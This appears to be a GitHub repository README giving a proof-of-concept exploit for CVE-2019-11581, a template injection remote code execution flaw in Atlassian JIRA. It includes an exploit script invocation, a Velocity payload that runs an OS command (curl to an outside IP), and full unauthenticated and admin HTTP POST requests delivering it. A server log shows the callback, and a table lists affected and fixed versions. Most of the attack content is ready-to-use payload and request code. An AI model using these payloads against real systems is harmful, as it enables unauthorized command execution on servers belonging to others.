Skip to content
Atlassian JIRA Template injection vulnerability RCE
Branch: master
Clone or download
Latest commit ceceadb Jul 22, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
CVE-2019-11581.jpg Add files via upload Jul 22, 2019
ContactAdministrators.jpg Add files via upload Jul 16, 2019
EditApplicationProperties.jpg Add files via upload Jul 16, 2019
README.md Update README.md Jul 22, 2019
SendBulkMail.jpg Add files via upload Jul 16, 2019
curl.jpg Add files via upload Jul 16, 2019
log.jpg Add files via upload Jul 16, 2019
v7.13.0.jpg Add files via upload Jul 16, 2019
version.jpg Add files via upload Jul 16, 2019

README.md

CVE-2019-11581

Atlassian JIRA Template injection vulnerability RCE

Demo

python CVE-2019-11581.py http://xx.xx.xx.xx:8080/ "Command"

Vuln Version Download

https://product-downloads.atlassian.com/software/jira/downloads/atlassian-jira-software-7.13.0-x64.exe

Poc

$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl 47.97.112.98:8000//jas502n//').waitFor()

Atlassian Jira Project Management Software (v7.13.0#713000-sha1:fbf4068)

0x01 前台-联系网站管理员(No auth)

subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29.exec%28%27curl+47.97.112.98%3A8000%2F%2Fjas502n%2F%2F%27%29.waitFor%28%29

POST /secure/ContactAdministrators.jspa HTTP/1.1
Host: 10.10.20.116:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 356
Referer: http://10.10.20.116:8080/secure/ContactAdministrators!default.jspa
Cookie: atlassian.xsrf.token=B6MK-HX7C-MR43-860H_23d834a2bed060db3006caa1d13445a9612e0d2a_lout; JSESSIONID=FCC6A28A80F6BBB6610A54327E4E8C66
X-Forwarded-For: 127.0.0.1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

from=232334%40qq.com&subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29.exec%28%27curl+47.97.112.98%3A8000%2F%2Fjas502n%2F%2F%27%29.waitFor%28%29&details=23423423&atl_token=B6MK-HX7C-MR43-860H_23d834a2bed060db3006caa1d13445a9612e0d2a_lout&%E5%8F%91%E9%80%81=%E5%8F%91%E9%80%81

0x02 secure/admin/SendBulkMail.jspa (need administrator password)

POST /secure/admin/SendBulkMail.jspa HTTP/1.1
Host: 10.10.20.116:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 433
Referer: http://10.10.20.116:8080/secure/admin/SendBulkMail!default.jspa
Cookie: atlassian.xsrf.token=B6MK-HX7C-MR43-860H_6146f3bed0f204ae619d52a0323ecd41ea5ecb6b_lin; JSESSIONID=32D0E863B383BDAAF8049FA4339D5C26
X-Forwarded-For: 127.0.0.1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

sendToRoles=true&projects=10000&roles=10002&replyTo=test%40qq.com&subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29.exec%28%27curl+47.97.112.98%3A8000%2F%2Fjas502n%2F%2F%27%29.waitFor%28%29&message=542342342&messageType=html&sendBlind=true&%E5%8F%91%E9%80%81=%E5%8F%91%E9%80%81&atl_token=B6MK-HX7C-MR43-860H_6146f3bed0f204ae619d52a0323ecd41ea5ecb6b_lin

Receiving data packets

python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
1xx.xx.xx4 - - [16/Jul/2019 12:13:43] code 404, message File not found
1xx.xx.xx4 - - [16/Jul/2019 12:13:43] "GET //jas502n// HTTP/1.1" 404 -

开启-前台-联系网站管理员

http://10.10.20.116:8080/secure/admin/EditApplicationProperties!default.jspa

Choose the cog icon  > System .
Choose General Configuration.
Click Edit Settings.
Scroll down to the  Contact Administrators Form and set it to ON.
Enter your text in the  Contact Administrators Message box. If you need markup assistance, click the ? under the box. 
Click Update.

Vuln Version

Affected Version	Fixed Version
4.4.x	7.6.14, 7.13.5, 8.0.3, 8.1.2, 8.2.3
5.x.x	7.6.14, 7.13.5, 8.0.3, 8.1.2, 8.2.3
6.x.x	7.6.14, 7.13.5, 8.0.3, 8.1.2, 8.2.3
7.0.x	7.6.14, 7.13.5, 8.0.3, 8.1.2, 8.2.3
7.1.x	7.6.14, 7.13.5, 8.0.3, 8.1.2, 8.2.3
7.2.x	7.6.14, 7.13.5, 8.0.3, 8.1.2, 8.2.3
7.3.x	7.6.14, 7.13.5, 8.0.3, 8.1.2, 8.2.3
7.4.x	7.6.14, 7.13.5, 8.0.3, 8.1.2, 8.2.3
7.5.x	7.6.14, 7.13.5, 8.0.3, 8.1.2, 8.2.3
7.6.x before 7.6.14	7.6.14, 7.13.5 (Enterprise Releases)
7.7.x	7.13.5, 8.0.3, 8.1.2, 8.2.3
7.8.x	7.13.5, 8.0.3, 8.1.2, 8.2.3
7.9.x	7.13.5, 8.0.3, 8.1.2, 8.2.3
7.10.x	7.13.5, 8.0.3, 8.1.2, 8.2.3
7.11.x	7.13.5, 8.0.3, 8.1.2, 8.2.3
7.12.x	7.13.5, 8.0.3, 8.1.2, 8.2.3
7.13.x before 7.13.5	7.13.5 (Enterprise Release)
8.0.x before 8.0.3	8.0.3
8.1.x before 8.1.2	8.1.2
8.2.x before 8.2.3	8.2.3
You can’t perform that action at this time.